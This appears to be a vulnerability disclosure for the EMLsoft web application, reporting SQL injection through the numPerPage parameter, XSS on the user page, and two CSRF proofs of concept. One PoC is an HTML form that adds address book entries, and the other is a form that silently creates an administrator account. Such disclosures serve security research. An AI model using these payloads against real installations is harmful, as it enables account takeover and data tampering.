Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
88 lines (62 sloc) 2.89 KB

EMLsoft

1.Address page SQL Injection

\upload\eml\action\action.address.php

It can be seen that if numPerPage has parameters, it is brought into the SQL statement for query, so SQL injection is generated.

Can see the incoming SQL statement, query the current database name

2.User page SQL Injection

\upload\eml\action\action.user.php

It can be seen that if numPerPage has parameters, it is brought into the SQL statement for query, so SQL injection is generated.

Can see the incoming SQL statement, query the current database name

3.User page XSS

XSS vulnerability exists in every input box of this page

4.Address page CSRF

After logging in, use the following POC to add address book information.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.10.10.39:8080/lalalalala/CMS/eml/upload/eml/?action=address&do=add" method="POST">
      <input type="hidden" name="name" value="123" />
      <input type="hidden" name="sex" value="%E7%94%B7" />
      <input type="hidden" name="phone" value="123" />
      <input type="hidden" name="tel" value="123" />
      <input type="hidden" name="email" value="123" />
      <input type="hidden" name="deparyment" value="123" />
      <input type="hidden" name="position" value="1" />
      <input type="hidden" name="address" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html> 

5.User page CSRF

After logging in, use the following POC to add an administrator.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.10.10.39:8080/lalalalala/CMS/eml/upload/eml/?action=user&do=add" method="POST">
      <input type="hidden" name="username" value="111" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="password" value="111" />
      <input type="hidden" name="name" value="" />
      <input type="hidden" name="sex" value="%E7%94%B7" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="deparyment" value="" />
      <input type="hidden" name="position" value="" />
      <input type="hidden" name="address" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>